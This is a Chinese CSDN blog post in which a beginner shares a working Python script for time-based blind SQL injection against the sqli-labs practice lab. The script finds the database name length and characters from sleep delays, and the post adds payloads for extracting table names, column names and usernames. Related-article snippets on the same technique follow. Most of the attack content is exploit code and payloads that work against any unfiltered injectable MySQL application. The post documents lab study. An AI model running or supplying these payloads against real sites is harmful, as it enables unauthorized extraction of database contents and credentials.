python sql延时注入脚本(从数据库名到字段)

最新推荐文章于 2023-11-08 13:52:35 发布
最新推荐文章于 2023-11-08 13:52:35 发布
阅读量2.6k 收藏 15
点赞数 4
文章标签: php sql python mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61815757/article/details/124155576
版权

我是萌新pwp,下面是我学了requests库 和 延时注入自己做的一个总结,如有错误,还请海涵Orz

首先是爆库

import requests                                  //最关键的requests库,可以好好了解一下
import time                                       //这个也是必要的
chars=',abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'//爆破
database=''                                                //把结果加到这个变量里
global length                                                

for l in range(1,20):                        //这里有时候range 要大些,因为用了group_concat把结果都放在一行了,可能使长度很大
    url ='http://192.168.1.100/sqli-labs-master/Less-5/' //url自己根据情况改
    close="?id=1'"                                       //闭合方式
    payload1=' and if(length(database())=%s,sleep(2),0) --+' %l       //最关键的地方,和其他注入方法的payload 差不多,只是用了延时的手法
    start_time=time.time()
    r=requests.get(url+close+payload1)
    end_time=time.time()
    sec=end_time-start_time                //算出get请求和sleep后所用的时间
    if  sec >=2:                           //时间符号条件就print并退出
        print('database length is '+str(l))
        global length
        length =l;
        break
    else:
        pass
for i in range (1,length+1):
    for char in chars:
        payload2="and if(substr(database(),%d,1)='%s',sleep(2),1) --+" %(i,char)//substr取每位爆破
        start_time2=time.time()
        r2=requests.get(url+close+payload2)
        end_time2=time.time()
        sec2=(end_time2-start_time2)//也是一样,符合条件就输出
        if sec2 >=2:
            database+=char
            print(database)
            break
print('database_name:',database)

如果没有过滤可以直接得到数据库名

如果要得到表名,脚本和上面差不多,url和close都一样,只需要改一下payload和一些变量名称

爆破的手法是:爆破长度,爆破名称

爆破表长的payload:

payload="and if(length((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1))=%s,sleep(3),1) --+" %l

爆破表名的payload:

payload = " and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema = database() limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)

//爆破名字的时候建议套上ascii()函数,这样不容易出错pwp

爆破列长的payload:


 

payload=" and if(length((select group_concat(column_name) from information_schema.columns where table_name = 'users' ))=%s,sleep(3),1) --+" %l

爆破列名的payload:

payload2 = " and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name = 'users' limit 0,1),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)

字段

爆破字段长的payload:

payload=" and if(length((select group_concat(username) from users ))=%s,sleep(3),1) --+" %l

爆破字段名的payload:

payload=" and if(ascii(substr((SeLeCt group_concat(username) from users ),%s,1)) = %s,sleep(3),1) --+" %(j,charAscii)

这里写的payload是在完全没有过滤的情况下才可以运行的。

运行环境:PyCharm Community Edition 2021.3.1

希望对各位有帮助

 

Jb1ack
关注
  • 4
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
37-5 基于时间的盲注 SQL 注入 PoC 的 Python 编写
weixin_43263566的博客
04-24 163
通过这个脚本,我们可以理解到利用Python编写脚本可以自动化执行一些复杂的任务,比如在这个例子中,我们通过自动化的方式来利用时间盲注漏洞获取数据库名称。,通过逐渐增加数据库名称长度的方式,发送带有长度检测payload的HTTP请求,直到找到正确的长度为止。,利用多线程技术,同时测试每个位置上的数据库名称字符,直到获取完整的数据库名称为止。,通过发送包含特殊payload的HTTP请求来检查是否存在SQL注入点。,用于测试给定位置的数据库名称字符是否匹配。下,依次调用上述函数,完成整个过程。
SQL注入之时间延迟型注入
DM766924的博客
09-16 1518
时间延迟型注入 原理:利用if函数,执行判断; 如果正确,直接返回(时间很短,网速有一定影响) 如果不正确,执行时间延迟,常用的函数有sleep和benchmark 以上操作也可以反过来。适用环境:界面无法用布尔真假判断,也无法报错注入的情况下。 时间延迟注入常用SQL函数介绍 if(condition,expr1,expr2)功能:如果condition是true,则if()的返回值是expr1,否则返回值则为expr2,if()的返回值为数字值或字符串,具体情况视其所在语境而定举例:select
python实现自动化延迟注入-时间盲注脚本-源代码
qq_54037445的博客
11-30 1609
在做手工的sql时间注入时,他需要一个字符一个字符的去猜,如果手动的去一个尝试,会浪费大量的时间,所以当时也就是了解他的原理后就没有试过了,这次尝试用python实现时间盲注。
SQL注入(延时注入)---zkaq
weixin_38237216的博客
04-11 4830
1.概念 1.延时注入:当进行盲注的时候,无论输入什么payload都会返回正常的处理信息,无法根据正确与错误的payload得到报错信息。这个时候就需要使用特定的时间函数,通过查看web页面的返回时间差来判断 2.常用函数 sleep() :将程序挂起一段时间n为n秒 if(expr1,expr2,expr3) :判断语句;如果第一个语句正确就执行第二个语句如果错误执行第三个语句 2.靶场 1.pass-13—延时注入(一) 通过题目中的sql语句可知,入参是用"闭合的,使用" and 1=1 – q
sql注入:延时注入python万能脚本
最新发布
一个努力学习网安的小牛马
11-08 254
【代码】sql注入:延时注入python脚本
Python----POC到EXP(requests模块、python脚本实现布尔盲注、延时注入
Pluto.的博客
12-27 2402
文章目录Python一、编写EXP1. requests模块- 概述- 支持HTTP的方法- requests使用HTTP方法- 参数- 对象对应的方法2. 快速开始3. 相关操作- 定制头部- 超时- GET传参- POST传参- 上传文件- 重定向- cookie4. py脚本实现布尔盲注5. py脚本实现延时注入- sys.argv[ ] Python 一、编写EXP EXP是漏洞利用工具; 基础环境Python3,核心模块requests。 1. requests模块 - 概述 requests
sql注入-延时注入】sleep()、benchmark()函数 延时注入
07-10 7140
延时注入】结合if、case when 延时注入
mysql延时注入脚本_py延迟注入SQL脚本
weixin_29450147的博客
01-19 273
#!/usr/bin/env python#-*- coding: utf-8 -*-#延迟注入工具importurllib2importtimeimportsocketimportthreadingimportrequestsclassmy_threading(threading.Thread):def __init__(self, str,x):threading.Thread.__init_...
时间延迟注入 py脚本
weixin_42819368的博客
04-23 499
import requests import string url = "http://172.16.88.33/Less-5/" ##url = raw_input("Input url :") def sql_sleep(url): try: res = requests.get(url,timeout=3) return res.text except Exception as ...
Python 安全开发 时间盲注脚本
YouthBelief的博客
10-26 1317
时间盲注0x00 时间盲注原理用到的函数有流程0x01脚本编写 (请求少,费时多)1.1用到的库1.2判断页面响应1.3判断返回字符串长度1.4 获取查询结果1.5 主函数0x02 脚本编写(请求多,费时少) 0x00 时间盲注原理 时间盲注应用于 页面 无论输入什么 页面显示 内容都一样, 可以用 ’ and sleep(5) --+ 发现 页面响应超过5秒 用到的函数有 sleep(5) 延时函数 延迟5秒 if($SQL,sleep(5),1) if函数 如果sql语句为真,执行sleep
mysql bool盲注_sql bool盲注
weixin_30141859的博客
01-27 147
[CISCN2019 总决赛 Day2 Web1]Easyweb考察:robots.txtimage.php?bak文件泄露,image.php.bak可以下载别的不大行盲注php日志挂马=可以绕过检测初步工作进入8fd7a79f-9b3c-4c4b-9d03-c8e1b7006a3a.node3.buuoj.cn/robots.txtDisallow: *.php.bak对暴露的php文件进行测...
实验吧-看起来有点难【基于sleep的sql注入脚本
Sp4rkW的博客
08-05 5329
原题内容: 切,你那水平也就这么点了,这都是什么题啊!!! 解题链接:http://ctf5.shiyanbar.com/basic/inject 先吐槽下,,,,这题目开了嘲讽!!! 硬肝了一上午,肝出来就,其实题目挺简单的,写个博客记录下几个个人的失误点,下面为解题思路。 首先login很有意思,admin/admin告诉我用户名密码均错误: 然后试了试1/1,...
sql盲注之报错注入(附自动化脚本)
dfdhxb995397的博客
12-29 849
作者:__LSA__ 0x00 概述 渗透的时候总会首先测试注入sql注入可以说是web漏洞界的Boss了,稳居owasp第一位,普通的直接回显数据的注入现在几乎绝迹了,绝大多数都是盲注了,此文是盲注系列的第一篇,介绍盲注中的报错注入。 0×01 报错注入原理 其实报错注入有很多种,本文主要介绍几种常见的报错方法,有新姿势后续再更新。 1. Dupli...
bugku-Web-INSERT INTO注入(case注入技巧(逗号被过滤的延迟盲注)+延迟注入脚本)
Sea_Sand息禅
03-31 1349
flag格式:flag{xxxxxxxxxxxx} 不如写个Python吧 error_reporting(0); function getIp(){ $ip = ''; if(isset($_SERVER['HTTP_X_FORWARDED_FOR'])){ $ip = $_SERVER['HTTP_X_FORWARDED_FOR']; }else{ $ip = $_SERVER['REM...
SQL注入-06】延时注入案例
m0_64378913的博客
04-26 2576
1 概述 当改变浏览器传给后台SQL的参数后, 浏览器没有显示对应内容也没有显示报错信息时,无法使用union联合查询注入与报错注入;同时,输入参数为真或假也无法从页面显示上查出差异,无法使用布尔注入 ,这时候可以试试看能否使用延时注入延时盲注:也称延时注入、时间注入等,这种注入方式在传给后台的参数中,设置了一个if语句,当条件为真时执行sleep语句,条件为假时无执行语句,然后根据浏览器的响应时间来推测sleep语句是否被执行,进而推测if条件是否为真。 延时盲注与布尔盲注的核心思想都是通过浏览器两种
SQL盲注(延时注入)
热门推荐
JKding123的博客
04-02 1万+
思路: *判断是否存在注入注入是字符型还是数字型 *猜解当前数据库名 *猜解数据库表名 *猜解字段名 *猜解数据 1判断注入类型 playload result 1’ and sleep(5) # 延迟 1 and sleep(5)# 没有延迟 存在字符型注入 2猜解当前数据库名 2.1猜解数据库名的长度: playload result 1’ and i...
python mysql延时注入_python延迟注入
weixin_42502075的博客
01-28 316
如果要爆数据啥的话就改py代码里面的select%20user(),替换为你要执行的sql即可[cc lang="python"]#!/usr/bin/env python# -*- coding: utf-8 -*-# 延迟注入工具import urllib2import timeimport socketimport threadingimport requestsclass my_threa...
py延迟注入SQL脚本
angaoux03775的博客
03-05 349
延迟注入工具(python) #!/usr/bin/env python # -*- coding: utf-8 -*- # 延迟注入工具 import urllib2 import time import socket import threading import requests class my_threading(threading.Thread): ...
一次手工和工具的延时注入(时间注入
qq_42097777的博客
03-29 7242
延时注入的原理 适用于,无法回现和无法显示错误页面的场景 ##利用函数sleep()让服务器休眠,通过休眠时间判断执行的语句对错,从而得到我们想要的信息 1,判断当前库名的长度 and if (length(database())=8,0,sleep(5))#0 结果=8时网页没睡眠,可以判断当前库名有8个字符 2,猜库名 and if (ascii(substr(database(),1,1)...
python sql注入检测脚本
04-24
很好,您希望了解有关 Python SQL 注入检测脚本的信息。 SQL注入是一种常见的Web应用程序攻击,可以使攻击者在不经过身份验证的情况下访问数据库。 在Python中,有许多SQL注入检测脚本可供选择,如SQLmap、SQLninja等。 这些脚本可以自动化地扫描Web应用程序中的SQL注入漏洞,并报告其发现的漏洞。 这些脚本可以帮助Web开发人员快速识别和修复安全漏洞,以保护其应用程序免受SQL注入攻击的威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值